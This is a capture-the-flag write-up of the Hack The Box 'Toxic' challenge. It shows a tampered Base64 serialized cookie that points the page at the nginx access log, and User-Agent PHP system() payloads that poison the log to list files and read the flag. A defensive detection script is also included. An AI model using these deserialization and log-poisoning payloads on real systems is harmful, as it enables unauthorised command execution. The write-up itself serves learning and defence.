Introduction
Hi, I'm Ajith. We are going to complete the Toxic web challenge on Hack The Box. It's a very easy challenge.
Connecting to the Toxic
First, we connect to the Hack The Box VPN and start the instance to get the IP address, then copy and paste the IP address into the browser. It shows the Dart Frog interface page. We also download the challenge file from Hack The Box.
Nmap Scan
Now we scan the IP address to see what services and servers are running on it. We found nginx running as the web server.
Analyzing File
We downloaded the Toxic file and analysed it. In the index.php file we located, the cookie is encoded using Base64.
Decoded cookie
We took the encoded cookie from the website and decoded it. The decoded cookie contains some information: the size is 15 and the file location is /www/index.html.
O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}
Changing cookie and header
We modify the cookie value, Base64-encode it, and then post it as the PHPSESSID value.
O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}
We modify the cookie and the User-Agent header, then forward the request to the website using Burp Suite.
User-Agent: <?php system('ls -l /');?>
Finally, we found the flag file.
Found the flag
Now we modify the header to open the flag file using the cat command and forward the request to the website using Burp Suite.
User-Agent: <?php system('cat /flag_32q6G');?>
Finally, we found the flag on the website.
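The same chain seen from the defender's side, as an added example that is not part of the original writeup or the challenge code: it checks a Base64 PHPSESSID value for a PageModel file path outside the web root and flags access-log lines that carry a PHP open tag. The /www/ web root is an assumption taken from the original cookie, and the sample cookies and log lines are constructed.

```python
import base64
import posixpath
import re

WEB_ROOT = "/www/"  # assumption: pages live under the directory seen in the original cookie
# Shape of the serialized PageModel cookie from the writeup: declared length, then path.
PAGEMODEL_RE = re.compile(r'^O:9:"PageModel":1:\{s:4:"file";s:(\d+):"([^"]*)";\}$')
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)  # PHP open tag inside a log line

def check_cookie(cookie_b64):
    """Return findings for a Base64 PHPSESSID value; an empty list means it looks normal."""
    try:
        raw = base64.b64decode(cookie_b64, validate=True).decode("utf-8")
    except ValueError:  # covers bad Base64 and bad UTF-8
        return ["cookie is not valid Base64 text"]
    match = PAGEMODEL_RE.match(raw)
    if not match:
        return ["cookie is not the expected PageModel object"]
    declared, path = int(match.group(1)), match.group(2)
    findings = []
    if declared != len(path.encode("utf-8")):
        findings.append("declared length %d does not match path length" % declared)
    normalized = posixpath.normpath(path)  # collapse ../ before comparing
    if not normalized.startswith(WEB_ROOT):
        findings.append("file path outside web root: " + normalized)
    return findings

def poisoned_log_lines(lines):
    """Return log lines carrying a PHP open tag, the log-poisoning indicator."""
    return [line for line in lines if PHP_TAG_RE.search(line)]

def encode(serialized):
    """Base64-encode a serialized string the way the cookie is encoded."""
    return base64.b64encode(serialized.encode("utf-8")).decode("ascii")

# Constructed sample data (not captured from the challenge).
NORMAL = encode('O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}')
TAMPERED = encode('O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}')
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php echo 1;?>"',
]

if __name__ == "__main__":
    print("normal:", check_cookie(NORMAL))
    print("tampered:", check_cookie(TAMPERED))
    for line in poisoned_log_lines(SAMPLE_LOG):
        print("suspicious log line:", line)
```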
Another Approach
We used another method to complete the challenge and find the flag. It was very simple: using Python code to complete the challenge.
This was the output of this challenge
Conclusion
A pretty easy challenge: just a file injection and we found the flag. I would rate it 2 out of 10.